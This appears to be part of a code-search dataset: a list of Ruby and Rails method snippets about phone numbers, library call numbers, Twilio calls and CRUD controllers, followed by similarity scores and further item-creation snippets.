"def make_call (number, international_code = 1, area_code = 646)\n puts \"Calling #{international_code}-#{area_code}-#{number}\"\n end",
"def initialize(call_number, text, note)\n @call_number = call_number\n @text = format_text(text)\n add_brackets = @call_number.present? || @text.present?\n @note = format_note(note, add_brackets)\n end",
"def WorldCatCheckControlNumbers(opts={})\n sRecord = \"\"\n @LastResponseCode = \"\"\n base_uri = WORLDCAT_METADATA_CHECK_CONTROL_NUMBERS_URI\n helper = Helper.new(:wskey => @wskey, :secret => @secret, :principalID=>@principalID, :principalDNS => @principalDNS)\n\n base_uri += \"?oclcNumbers=\" + opts[:oclcNumber]\n response = helper.MakeHTTPRequest(:url => base_uri, :method => \"GET\", :accept => \"application/atom+json\")\n @debug_info = helper.debug_string + \"\\n\\n\" + base_uri\n @LastResponseCode = response\n sRecord = response\n return sRecord\n end",
"def set_calldetail\n @calldetail = Calldetail.find(params[:id])\n end",
"def dial(\n number: nil,\n action: nil,\n method: nil,\n timeout: nil,\n hangup_on_star: nil,\n time_limit: nil,\n caller_id: nil,\n record: nil,\n trim: nil,\n recording_status_callback: nil,\n recording_status_callback_method: nil,\n **keyword_args\n )\n\n dial = Dial.new(\n number: number,\n action: action,\n method: method,\n timeout: timeout,\n hangup_on_star: hangup_on_star,\n time_limit: time_limit,\n caller_id: caller_id,\n record: record,\n trim: trim,\n recording_status_callback: recording_status_callback,\n recording_status_callback_method: recording_status_callback_method,\n **keyword_args\n )\n\n yield(dial) if block_given?\n append(dial)\n end",
"def create\n @ca_lotto_number = CaLottoNumber.new(params[:ca_lotto_number])\n\n respond_to do |format|\n if @ca_lotto_number.save\n format.html { redirect_to @ca_lotto_number, notice: 'Ca lotto number was successfully created.' }\n format.json { render json: @ca_lotto_number, status: :created, location: @ca_lotto_number }\n else\n format.html { render action: \"new\" }\n format.json { render json: @ca_lotto_number.errors, status: :unprocessable_entity }\n end\n end\n end",
"def assign_phone_number\n if !params[:customer].blank? && !params[:call_id].blank?\n call = Radius::Call.find_by_radacctid(params[:call_id].to_i)\n customer = Customer.find_by_name_and_address(params[:customer])\n if !call\n flash[:error] = 'Call not found'\n elsif !customer\n flash[:error] = 'Customer not found'\n else\n customer.phones.add call.caller\n end\n end\n redirect_to :action => :index\n end",
"def read_number\n @db.get_first_value 'SELECT number from crl_number'\n end",
"def call_number_link(holding, cn_value)\n cn = ''\n unless cn_value.nil?\n children = call_number_span\n cn_browse_link = link_to(children.html_safe,\n \"/browse/call_numbers?q=#{CGI.escape(cn_value)}\",\n class: 'browse-cn',\n title: \"Browse: #{cn_value}\",\n 'data-toggle' => 'tooltip',\n 'data-original-title' => \"Browse: #{cn_value}\")\n cn = \"#{holding['call_number']} #{cn_browse_link}\"\n end\n content_tag(:td, cn.html_safe, class: 'holding-call-number')\n end",
"def bib\n self.response = self.class.get(\"#{record_url}?view=full\")\n raise_error_if(\"Error getting bib from Aleph REST APIs.\") {\n (response.parsed_response[\"get_record\"].nil? or response.parsed_response[\"get_record\"][\"record\"].nil?)\n }\n MARC::XMLReader.new(StringIO.new(xml(xml: response.body).at_xpath(\"get-record/record\").to_xml(xml_options).strip)).first\n end",
"def update\n @number_call = NumberCall.find(params[:id])\n\n respond_to do |format|\n if @number_call.update_attributes(params[:number_call])\n format.html { redirect_to @number_call, notice: 'Number call was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @number_call.errors, status: :unprocessable_entity }\n end\n end\n end",
"def corporate_number=(corporate_number)\n\n if !corporate_number.nil? && corporate_number !~ Regexp.new(/^\\\\d{13}$/)\n fail ArgumentError, \"invalid value for 'corporate_number', must conform to the pattern /^\\\\d{13}$/.\"\n end\n\n @corporate_number = corporate_number\n end",
"def write_number(crl_number)\n return nil if @crl_number_file.nil?\n\n write_data(@crl_number_file, crl_number.to_s)\n end",
"def update\n\n if !params[:number][:business_number].blank?\n params[:number][:business_number] = \"+1\"+Phony.normalize(params[:number][:business_number])\n end\n\n if !params[:number][:tracking_number].blank?\n params[:number][:tracking_number] = \"+1\"+Phony.normalize(params[:number][:tracking_number])\n end\n\n respond_to do |format|\n if @number.update(number_params)\n format.html { redirect_to numbers_url, notice: 'Number was successfully updated.' }\n format.json { render :show, status: :ok, location: @number }\n else\n format.html { render :edit }\n format.json { render json: @number.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n\n if !params[:number][:business_number].blank?\n params[:number][:business_number] = \"+1\"+Phony.normalize(params[:number][:business_number])\n end\n\n if !params[:number][:tracking_number].blank?\n params[:number][:tracking_number] = \"+1\"+Phony.normalize(params[:number][:tracking_number])\n end\n\n respond_to do |format|\n if @number.update(number_params)\n format.html { redirect_to numbers_url, notice: 'Number was successfully updated.' }\n format.json { render :show, status: :ok, location: @number }\n else\n format.html { render :edit }\n format.json { render json: @number.errors, status: :unprocessable_entity }\n end\n end\n end",
"def show\n @ca_lotto_number = CaLottoNumber.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @ca_lotto_number }\n end\n end",
"def phone_number; end",
"def phone_number; end",
"def new\n @bill = Bill.find(params[:bill_id])\n @billed_call = @bill.billed_calls.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @billed_call }\n end\n end",
"def get_bib(bibnum)\n cbn = clean_bibnum(bibnum)\n if cbn.empty?\n Rails.logger.error \"ERROR: OpacRecordService#get_bib called with invalid bib number #{bibnum}\"\n raise InvalidOpacRecordNumber, 'invalid bib number'\n else\n begin\n response = token.get(\"#{@path}/bibs/#{cbn}\")\n rescue OAuth2::Error => e\n Rails.logger.error \"ERROR: OpacRecordService#get_bib #{e}\"\n raise OpacConnectionError, 'error connecting or authenticating with the opac'\n else\n # It may seem like we should just return the unparsed (json) body, since\n # the controller will pull from here and then need to turn it into json again.\n # But I expect to do lots of data processing here in /services; therefore\n # controller should expect the hash and convert it back to json for consumption.\n response.parsed\n end\n end\n end",
"def make_phone_call(number, international_code = '+254', area_code = 7)\n puts \"calling #{international_code}-#{area_code}#{number}\"\nend",
"def update\n @call_num = CallNum.find(params[:id])\n\n respond_to do |format|\n if @call_num.update_attributes(params[:call_num])\n flash[:success] = 'Call number was successfully updated.'\n format.html { redirect_to add_details_path }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @call_num.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n \t@session_id=session[:id]\n\t@session = Session.find(session[:id])\n\t@person = Person.find(@session.person_id)\n\t@appointment_payment = AppointmentPayment.new(params[:appointment_payment])\n\t@appointment_payment.patient_name=Number.new.change_patient_name(@appointment_payment.patient_name)\n \t\n\t# Get updated receipt/bill no\n\treceipt_no=Number.new # Create object to number table\n\t@appointment_payment.bill_no11=receipt_no.get_number('receipt',@appointment_payment.org_code) \t# Method calling \n\t# end\n respond_to do |format|\n if @appointment_payment.save\n \t@n=Number.find_by_name_and_org_code(\"receipt\",@appointment_payment.org_code)\n\t\t@n.value=@appointment_payment.bill_no11\n\t\t@n.update_attributes(params[:n])\n format.html { redirect_to(\"/appointment_payments/report/#{@appointment_payment.id}?print_type=original&format=pdf\") }\n format.xml { render :xml => @appointment_payment, :status => :created, :location => @appointment_payment }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @appointment_payment.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def show\n @call_num = CallNum.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @call_num }\n end\n end",
"def number\n apartment_information[:number]\n end",
"def initialize(number)\n validate!\n @type_car = :cargo\n @number_car = number\n super(@number_car, @type_car)\n end",
"def cid(cdr)\n if cdr.phone\n number_to_phone(cdr.phone.complete_phone_number, :area_code => true) \n else\n cdr.src\n end \n end",
"def record()\n # Staying in Germany for now:\n country_code = '+49'\n # Between 2 and 5 digits area codes (max 2 + 3):\n area_digits_quantity = 2 + rand(4)\n # Area code has no trailing zeros. E.g. with 4 digits minimum is 1000.\n min_area_code = 10 ** (area_digits_quantity - 1)\n # Biggest 5 digit area code is 99999, i.e. 10**5 - 1\n max_area_code = 10 ** area_digits_quantity - 1\n # Get a random number in the range min_area_code to max_area_code:\n area_code = min_area_code + rand( max_area_code - min_area_code + 1 )\n # Today area code and subscriber line are 10 digits in total.\n subscriber_digits_quantity = 10 - area_digits_quantity\n min_subscriber_number = 10 ** (subscriber_digits_quantity - 1)\n max_subscriber_number = 10 ** subscriber_digits_quantity - 1\n subscriber_number = min_subscriber_number + rand( max_subscriber_number - min_subscriber_number + 1 )\n PhoneNumber.new( country_code, area_code, subscriber_number )\n end",
"def create\n @contact_number = ContactNumber.new(params[:contact_number])\n\n respond_to do |format|\n if @contact_number.save\n flash[:notice] = 'ContactNumber was successfully created.'\n format.html { redirect_to(@contact_number) }\n format.xml { render :xml => @contact_number, :status => :created, :location => @contact_number }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @contact_number.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def number(twilio=false, name=nil, area_code=nil)\n if twilio\n # Check if twilio configuration exists. If not throw and errors because twilio was passed as true.\n if !@config[:configuration][:twilio].blank? and (!@config[:configuration][:twilio][:account_id].blank? and !@config[:configuration][:twilio][:api_key].blank?)\n account = @config[:configuration][:twilio][:account_id]\n key = @config[:configuration][:twilio][:api_key]\n\n # Initialize twilio client.\n twilio = Twilio::REST::Client.new account, key\n\n # If any area code is provide look for local numbers, if not get a toll free.\n if area_code.blank?\n available_numbers = twilio.account.available_phone_numbers.get('US').toll_free.list\n else\n available_numbers = twilio.account.available_phone_numbers.get('US').local.list(area_code: area_code) unless area_code.blank?\n end\n\n # Select the first number available.\n available_number = available_numbers.first\n\n # If available numbers is blank throw an error because something went wrong.\n if available_numbers.blank?\n raise StandardError, \"No Available Numbers\"\n else\n\n # Convert the phone number into something a artificial voice can say.\n phone_number = available_number.phone_number.gsub(\"+1\",\"\")\n phone_number = \"#{phone_number[0..2]}-#{phone_number[3..5]}-#{phone_number[6..10]}\"\n\n\n # Setting the transciption email\n # email = @config[:configuration][:twilio][:transcription_email].blank? ? \"developers%40level.agency\" : @config[:configuration][:twilio][:transcription_email]\n email = \"developers%40level.agency\"\n # Put together the voicemail Twimil.\n voice_message = \"http://twimlets.com/voicemail?Email=#{email}&Message=You%20reached%20the%20voicemail%20box%20of%20#{phone_number}.%20%20Please%20leave%20a%20message%20after%20the%20beep.&Transcribe=true&\"\n\n # Here we buy the number, set the voice_url to the voicemail Twimil and set the\n # sms_url to echo so Twilio will capture the message but not reply to it.\n number = twilio.account.incoming_phone_numbers.create({\n phone_number: available_number.phone_number,\n friendly_name: name,\n voice_url: voice_message,\n voice_method: \"GET\",\n sms_url: \"http://twimlets.com/echo?Twiml=%3CResponse%3E%3C%2FResponse%3E\",\n sms_method: \"GET\"\n })\n\n # If number is blank throw and error because something went wrong.\n if number.blank?\n raise StandardError, \"Unable to allocate Twilio number\"\n else\n number.phone_number\n end\n end\n else\n raise ArgumentError, \"Cannot find Twilio Account ID and API key in configuration\"\n end\n else\n Faker::PhoneNumber.phone_number\n end\n end",
"def destroy\n @call_num = CallNum.find(params[:id])\n @call_num.destroy\n\n respond_to do |format|\n flash[:success] = 'Call number was successfully deleted.'\n format.html { redirect_to add_details_path }\n format.xml { head :ok }\n end\n end",
"def number\n HookNumber.new(number_record)\n end",
"def set_number\n binding.pry\n @number = Number.find(params[:id])\n end",
"def query_ol_api(call_number:)\n conn = Faraday.new(url: \"#{catalog_host}/catalog.json\")\n result = conn.get do |req|\n req.params[\"search_field\"] = \"all_fields\"\n req.params[\"f[call_number_browse_s][]\"] = call_number\n end\n\n json = JSON.parse result.body\n # return nil unless json[\"response\"][\"docs\"].count.positive?\n json[\"response\"][\"docs\"].map { |doc| doc[\"id\"] } # will be [] if no results\n end",
"def marc_record_from_marcxml\n id = fetch(_marc_source_field)\n\n response = Faraday.get(\"#{Requests.config['bibdata_base']}/bibliographic/#{id}\")\n @can_retry = response.status == 429\n response_stream = StringIO.new(response.body)\n marc_reader = ::MARC::XMLReader.new(response_stream)\n marc_records = marc_reader.to_a\n marc_records.first\n end",
"def add(number)\n path_str = \"/api/v1/#{@list_type_path}/#{number.id}/add.json\"\n #puts \"Add to #{@account_id}:#{@source_id} -> #{number.id} -> #{path_str}\"\n # accounts/25 /sources/5012 /numbers\n # /api/v1/accounts/:account_id/sources/:source_id/numbers/:id/add\n res = self.class.post(path_str, :body => {}.merge(:auth_token => @token))\n if res && res['status'] == 'success'\n CTM::Source.new(res['source'], @token)\n else\n puts res.inspect\n raise CTM::Error::Add.new(res[\"reason\"])\n end\n end",
"def get_call_number(item_display)\n get_item_display_piece(item_display, 0)\n end",
"def display_number\n self['display_number'] ||= self.class.mask(number)\n self['display_number']\n end",
"def enter_reference_nbr(test_data)\n hide_notifications_bar\n wait_for_options_and_type(reference_nbr_input, reference_nbr_options, test_data[UseOfCollections::REFERENCE_NBR.name])\n end",
"def delete(cab_number)\n @fleet.release_cab(cab_number, @cab_type)\n return { message: \"Ok\", cab_number: cab_number }\n end",
"def find_by_number(number)\n response = session.request(entity_class.soap_action('FindByNumber')) do\n soap.body = {\n 'number' => number\n }\n end\n\n if response == {}\n nil\n else\n creditor = build\n creditor.partial = true\n creditor.persisted = true\n creditor.handle = response\n creditor.number = response[:number].to_i\n creditor\n end\n end",
"def set_borrow\n @borrow = Borrow.find(params[:id])\n end",
"def show\n @library_contact = @library_location.library_contacts.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @library_contact }\n end\n end",
"def make_phone_call(number, international_code = 1, area_code = 646)\n puts \"Calling #{international_code}-#{area_code}-#{number}\"\nend",
"def release_cab(number, cab_type)\n (cab_type == 'pink') ? (cabs = @pink_cabs) : (cabs = @go_cabs)\n\n cabs[number].available = true\n cabs[number].location = cabs[number].user.drop_location\n end",
"def complaints_complaints_with_http_info(phone_number, opts = {})\n if @api_client.config.debugging\n @api_client.config.logger.debug \"Calling API: ComplaintsApi#complaints_complaints ...\"\n end\n \n # verify the required parameter 'phone_number' is set\n fail \"Missing the required parameter 'phone_number' when calling complaints_complaints\" if phone_number.nil?\n \n # resource path\n local_var_path = \"/api/2015-11-01/Complaints/{phoneNumber}\".sub('{format}','json').sub('{' + 'phoneNumber' + '}', phone_number.to_s)\n\n # query parameters\n query_params = {}\n\n # header parameters\n header_params = {}\n\n # HTTP header 'Accept' (if needed)\n _header_accept = ['application/json', 'text/json', 'application/xml', 'text/xml']\n _header_accept_result = @api_client.select_header_accept(_header_accept) and header_params['Accept'] = _header_accept_result\n\n # HTTP header 'Content-Type'\n _header_content_type = []\n header_params['Content-Type'] = @api_client.select_header_content_type(_header_content_type)\n\n # form parameters\n form_params = {}\n\n # http body (model)\n post_body = nil\n \n auth_names = []\n data, status_code, headers = @api_client.call_api(:GET, local_var_path,\n :header_params => header_params,\n :query_params => query_params,\n :form_params => form_params,\n :body => post_body,\n :auth_names => auth_names,\n :return_type => 'Complaints')\n if @api_client.config.debugging\n @api_client.config.logger.debug \"API called: ComplaintsApi#complaints_complaints\\nData: #{data.inspect}\\nStatus code: #{status_code}\\nHeaders: #{headers}\"\n end\n return data, status_code, headers\n end",
"def enter_reference_nbr(test_data)\n hide_notifications_bar\n logger.info \"Entering reference number '#{test_data[CoreUseOfCollectionsData::REFERENCE_NBR.name]}'\"\n wait_for_options_and_type(reference_nbr_input, reference_nbr_options, test_data[CoreUseOfCollectionsData::REFERENCE_NBR.name])\n end",
"def reference_credit_note\n object.credit_note_ref.to_s\n end",
"def create\n\t\tapi_response = FaxNumber.provision(provision_number_params[:area_code])\n\t\tif api_response.phone_number\n\t\t\tFaxNumber.create!(fax_number: api_response.phone_number, has_webhook_url: false, org_switched_at: Time.now)\n\t\t\tflash[:notice] = \"Fax number provisioned successfully. Your new number is #{FaxNumber.format_pretty_fax_number(api_response.phone_number)}.\"\n\n\t\t\t# Adds fax number to the organization immediately \n\t\t\tif provision_number_params[:organization_id]\n\t\t\t\tnumber = FaxNumber.find_by(fax_number: api_response.phone_number)\n\t\t\t\tnumber.update_attributes(organization_id: provision_number_params[:organization_id])\n\t\t\t\tredirect_to organization_path(provision_number_params[:organization_id])\n\t\t\telse\n\t\t\t\tredirect_to fax_numbers_path\n\t\t\tend\n\t\telse\n\t\t\tflash[:alert] = \"Something went wrong\"\n\t\t\trender :new\n\t\tend\n\tend",
"def create\n @phone_number = @kontact_information.phone_numbers.build(params[:phone_number])\n respond_to do |format|\n if @phone_number.save\n flash[:notice] = 'Phone number was successfully created.'\n format.html { redirect_to(@phone_number) }\n format.mobile {redirect_to profile_kontact_kontact_information_plural_fields_path(@profile, @kontact)}\n format.xml { render :xml => @phone_number, :status => :created, :location => @phone_number }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @phone_number.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create_temp_holdings_for_processing(rec)\n # init_holdings is a hash of the parameters needed to create a\n # HoldingsRecord object.\n # Initially we set the first 4, which come from 999 92s\n init_holdings = {}\n occ = 0\n Traject::MarcExtractor.cached(\"999|92|\").each_matching_line(rec) do |field, spec, extractor|\n id = field['a']\n loc = field['b']\n next if loc.start_with?('e')\n ct = field['c']\n occ = occ += 1\n\n init_holdings[id] = [id, loc, ct, occ]\n end\n\n if init_holdings.length > 0\n # field_hash\n # key = holdings record id\n # value = array of MARC::DataFields created from 999 93s determined to\n # be relevant to subsequent display/processing\n field_hash = {}\n \n Traject::MarcExtractor.cached(\"999|93|\").each_matching_line(rec) do |field, spec, extractor|\n recid = field['0']\n\n df = new_data_field(field) if \n ( field['2'] == '852' && field['3'] == 'c' ) ||\n ( field['2'] =~ /85[345]/ && field['3'] == 'y' ) ||\n ( field['2'] =~ /86./ && field['3'] == 'h' )\n\n if df\n if field_hash.has_key?(recid)\n field_hash[recid] << df\n else\n field_hash[recid] = [df]\n end\n end\n end\n\n # field_hash values are appended to the relevant parameter array of init_holdings\n field_hash.each { |k, v| init_holdings[k] << v if init_holdings[k] }\n\n # create new HoldingsRecord object \n holdings_array = []\n init_holdings.each_value do |hdata|\n # if there are no relevant variable fields, we don't need to output holdings data\n if hdata.size == 5\n holdings_array << HoldingsRecord.new(hdata[0], hdata[1], hdata[2],\n hdata[3], hdata[4]) \n end\n end\n\n # make sure they are in ILS order\n return holdings_array.sort_by { |h| h.occ }\n end\n end",
"def create\n @call = Call.new(params[:call])\n \n respond_to do |format|\n if @call.save\n \n result = OutgoingCallerId.find(:last)\n twcall = @twilio_client.account.calls.create(\n from: result.phone_number,\n to: @call.to, \n url: \"#{url_for(@call)}/twiml.xml\")\n \n @call.update_attribute :sid, twcall.sid\n format.html { redirect_to @call, notice: \"Call was successfully created.#{url_for(@call)}\" }\n format.json { render json: @call, status: :created, location: @call }\n else\n format.html { render action: \"new\" }\n format.json { render json: @call.errors, status: :unprocessable_entity }\n end\n end\n end",
"def book(params)\n rate_plan = price_handler.best_rate_plan(params)\n\n return rate_plan unless rate_plan.success?\n\n u_id = JTB::UnitId.from_roomorama_unit_id(params[:unit_id])\n\n message = builder.build_booking(params, rate_plan.value, u_id.room_type_code)\n result = remote_call(message)\n return result unless result.success?\n\n result = response_parser.parse_booking(result.value)\n return result unless result.success?\n\n reference_number = ReferenceNumber.from_jtb_ids(result.value, rate_plan.value.rate_plan)\n\n Result.new(reference_number.reference_number)\n end",
"def create\n @insurance_master = InsuranceMaster.new(params[:insurance_master])\n\t\n\t@cde=InsuranceMaster.last(:conditions =>\"org_code='#{@insurance_master.org_code}'\")\n\tif(@cde)\n\t\t@t_no=(@cde.code.to_i+1).to_s\n\telse\n\t\t@t_no=\"666000\"\n\tend\n if(params[:call_from])\n @call_from=\"registrations\"\n else\n @call_from=\"new\"\n end\n\t@insurance_master.code=@t_no\n\t\n respond_to do |format|\n if @insurance_master.save\n format.html { redirect_to(\"/insurance_masters/show/#{@insurance_master.id}?call_from=#{@call_from}\", :notice => 'InsuranceMaster was successfully created.') }\n format.xml { render :xml => @insurance_master, :status => :created, :location => @insurance_master }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @insurance_master.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def rebuild_competitors(bib_numbers)\n clear_competitors\n build_competitors(bib_numbers)\n end",
"def create_cdrs(account_number, cdrs_form)\r\n # the base uri for api requests\r\n query_builder = Configuration.base_uri.dup\r\n\r\n # prepare query string for API call\r\n query_builder << '/accounts/{account_number}/cdrs'\r\n\r\n # process optional query parameters\r\n query_builder = APIHelper.append_url_with_template_parameters query_builder, {\r\n 'account_number' => account_number\r\n }\r\n\r\n # validate and preprocess url\r\n query_url = APIHelper.clean_url query_builder\r\n\r\n # prepare headers\r\n headers = {\r\n 'user-agent' => 'APIMATIC 2.0',\r\n 'accept' => 'application/json',\r\n 'content-type' => 'application/json; charset=utf-8',\r\n 'X-Auth-Token' => Configuration.x_auth_token\r\n }\r\n\r\n # invoke the API call request to fetch the response\r\n response = Unirest.post query_url, headers: headers, parameters: cdrs_form.to_json\r\n\r\n # Error handling using HTTP status codes\r\n if response.code == 401\r\n raise APIException.new 'You are not authenticated', 401, response.raw_body\r\n elsif response.code == 403\r\n raise APIException.new 'This action needs a valid WSSE header', 403, response.raw_body\r\n elsif response.code == 404\r\n raise APIException.new 'Resource not found', 404, response.raw_body\r\n elsif response.code == 400\r\n raise APIException.new 'Http bad request', 400, response.raw_body\r\n elsif !response.code.between?(200, 206) # [200,206] = HTTP OK\r\n raise APIException.new 'HTTP Response Not OK', response.code, response.raw_body\r\n end\r\n\r\n response.body\r\n end",
"def initialize(id, loc, ct, occ, fields)\n @id = id\n @loc = loc\n @card_ct = ct\n @occ = occ\n @fields = fields.freeze\n @call_numbers = []\n @notes = []\n @patterns = {}\n @enums_and_chrons = {}\n @summary_holding = []\n @summary_holding_supplement = []\n @summary_holding_index = []\n end",
"def new\n\t@session_id=session[:id]\n\t@session = Session.find(session[:id])\n\t@person = Person.find(@session.person_id)\n\t@org_code=@person.org_code\n\t@org_location=@person.org_location\n \t@test_booking = TestBooking.new\n \n\t@item_master=ChargeMaster.all(:conditions => \"org_code = '#{@org_code}'\")\n\n\t10.times{ @test_booking.test_booking_child.build }\n\tstr=\"\"\n\tstr1=\"\"\n\t@barcode_id=\"\"\n\t@tb=TestBooking.last(:conditions =>\"org_code='#{@org_code}'\")\n \tif(@tb)\n\t\tn=(@tb.lab_no.slice!(3..50).to_i+1).to_s \n\t\t@barcode_id=@tb.barcode_id.next\t\n \tstr=\"Lab\"+n\n\telse\n n=1.to_s\n @barcode_id=\"201208001\"\n\t\tstr=\"Lab\"+n\n\tend\n\t@test_booking.lab_no=str\n\treceipt_no=Number.new\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Create object to number table\n\t@test_booking.bill_no=receipt_no.get_number('receipt',@org_code) \t# Method calling \n\t\n\t# end\n\t\n\t@appt_payment = AppointmentPayment.all(:conditions => \"appt_date = '#{Date.today}'\")\n\t@admissions = Admission.all(:conditions => \"admn_status = 'admitted'\", :order => \"id DESC\")\n\t@registration=Registration.all(:order => \"id DESC\")\n\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @test_booking }\n end\n end"
] |
[
"0.5754502",
"0.5726902",
"0.5719064",
"0.564893",
"0.5638431",
"0.55748886",
"0.55748886",
"0.55579716",
"0.5534168",
"0.55070084",
"0.5491602",
"0.5445457",
"0.53901386",
"0.5379921",
"0.53433573",
"0.53317064",
"0.5296885",
"0.5295421",
"0.5294268",
"0.5220695",
"0.5185369",
"0.5176848",
"0.51733005",
"0.5152954",
"0.51469994",
"0.5129037",
"0.5126479",
"0.511186",
"0.5054201",
"0.5040991",
"0.503538",
"0.503538",
"0.503538",
"0.503538",
"0.503538",
"0.503538",
"0.5026519",
"0.50244206",
"0.50217956",
"0.5010081",
"0.4987174",
"0.49821746",
"0.49733624",
"0.49658653",
"0.4961315",
"0.495585",
"0.49466679",
"0.49397948",
"0.4924017",
"0.48956603",
"0.48950276",
"0.4885316",
"0.48727703",
"0.48677582",
"0.48499888",
"0.48424244",
"0.48396075",
"0.48396075",
"0.48162067",
"0.48157698",
"0.48157698",
"0.4811284",
"0.48098585",
"0.48071185",
"0.4806867",
"0.47939676",
"0.47926384",
"0.4790437",
"0.47753513",
"0.47724414",
"0.47705007",
"0.47625116",
"0.4755167",
"0.4751795",
"0.47376943",
"0.4736855",
"0.47350824",
"0.4717592",
"0.47026786",
"0.4700121",
"0.4695872",
"0.46945006",
"0.4692426",
"0.46919665",
"0.46907082",
"0.4688148",
"0.4687602",
"0.4669447",
"0.46664327",
"0.46632606",
"0.46631226",
"0.46575433",
"0.4657339",
"0.46551734",
"0.46536365",
"0.46504885",
"0.46503446",
"0.46476504",
"0.46468574",
"0.46440986",
"0.46422833"
] |
0.0
|
-1
|
Create a new Item Record.
|
def new_item(opts={})
defaults = {:number => @items.count + 1}
@items << ItemRecord.new(defaults.merge(opts))
end
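
A short, self-contained usage sketch of the auto-numbering pattern above (the ItemRecord shown here is a hypothetical Struct stand-in; the real class is not part of this record). Because of defaults.merge(opts), items are numbered sequentially by default, but a caller-supplied :number wins:

ItemRecord = Struct.new(:number, :title)

class Catalog
  def initialize
    @items = []
  end

  # Mirrors the document above: merge lets explicit options override defaults.
  def new_item(opts = {})
    merged = { number: @items.count + 1 }.merge(opts)
    @items << ItemRecord.new(merged[:number], merged[:title])
  end

  attr_reader :items
end

c = Catalog.new
c.new_item(title: 'first')              # auto-numbered 1
c.new_item(number: 9, title: 'second')  # explicit number wins
p c.items.map(&:number)                 # => [1, 9]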
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create\n \n #debug\n write_log(\n Const::SL::LOG_PATH_SL,\n \"items_controller#create(params[:item] => #{params[:item]})\",\n # __FILE__,\n __FILE__.split(\"/\")[-1],\n __LINE__.to_s)\n\n \n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render json: @item, status: :created, location: @item }\n else\n format.html { render action: \"new\" }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create(params = {})\n item = build(params)\n item.save\n item\n end",
"def createItem(title, description, date)\n new_item = List.new\n new_item.title = title\n new_item.description = description\n new_item.save\n new_item.date = date\n end",
"def create(attributes)\n response = JSON.parse(@client.post('items', attributes).body)\n Promisepay::Item.new(@client, response['items'])\n end",
"def create_item(name, price)\r\n new_item = Models::Item.created( name, price, self )\r\n self.item_list.push(new_item)\r\n new_item.save\r\n return new_item\r\n end",
"def create_item(data)\n fail 'Base class does not include ::Record!' if @base && !@base.include?(::Record)\n item = (@base || Record).new\n item.data = data\n item\n end",
"def create\n item = list.items.create!(item_params)\n render json: item, status: 201\n end",
"def new\n @item = Item.new\n end",
"def create_item(item_request_body, opts = {})\n data, _status_code, _headers = create_item_with_http_info(item_request_body, opts)\n data\n end",
"def create\n\t\titem = Item.create(item_params)\n\t\trender json: item\n\tend",
"def new_item(content)\n Item.new(:project_id => @project_id, :content => content)\n end",
"def new\n \t@item=Item.new({:ItemName =>'def'})\n end",
"def create\n __log_activity\n __debug_route\n @item = create_record(no_raise: true)\n errors = @item&.errors || 'Not created' # TODO: I18n\n user_authorize!\n respond_to do |format|\n if errors.blank?\n format.html { redirect_success(__method__) }\n format.json { render :show, location: @item, status: :created }\n else\n format.html { redirect_failure(__method__, error: errors) }\n format.json { render json: errors, status: :unprocessable_entity }\n end\n end\n rescue Record::SubmitError => error\n post_response(:conflict, error)\n rescue => error\n post_response(error)\n end",
"def create_item\n @item = Fox_Item.new(self, @content.join(\"\\t\"), @icon, @icon)\n end",
"def create\n\t \t@item = Item.new(item_params)\n\t \tif @item.save\n\t \t\tredirect_to items_path\n\t \telse\n\t \t\trender action: \"new\"\n\t \tend\n\t end",
"def new\n @item = Item.new\n end",
"def new\n @item = Item.new\n end",
"def new\n @item = Item.new\n end",
"def create_item(item_code)\n \t\txero = XeroConnection.new.connect\n\n \t\tif xero.Item.all(where: 'code == \"%s\"' % item_code).empty?\n \t\t\tnew_item = xero.Item.build(code: item_code)\n \t\t\tnew_item.save\n \t\tend\n \tend",
"def create\n @item = @list.items.build(item_params)\n @item.user = current_user\n\n if @item.save\n return success_item_create\n else\n return error_item_save\n end\n end",
"def create\n # defined object to receive strict item_params including :description, :price, :stockQty ; else return 400\n @item = Item.new(item_params)\n \n if @item.save\n render json: @item.to_json, status: 201\n else\n head 400\n end\n end",
"def create_item(user_id, data) \n data = data.just(SETTABLE_ITEM_FIELDS)\n data[:user_id] = user_id\n data[:title] ||= 'item'\n data[:price] ||= 5\n data[:price] = data[:price].to_i\n data[:slug] = get_unique_slug($items,:slug,data[:title])\n\n data[:imgs] = data[:imgs].to_a.map {|link| {link: link}}\n data[:videos] = data[:videos].to_a.map {|link| {link: link}}\n data[:status] = :pending\n item = $items.add(data)\nend",
"def create\r\n @item = Item.new(params[:item])\r\n if @item.save\r\n redirect_to @item, notice: 'Item was successfully created.'\r\n else\r\n render action: \"new\"\r\n end\r\n end",
"def create\n @item = Item.new(item_params)\n @item.save\n redirect_to @item\n end",
"def create\n @item = Item.new(item_params)\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
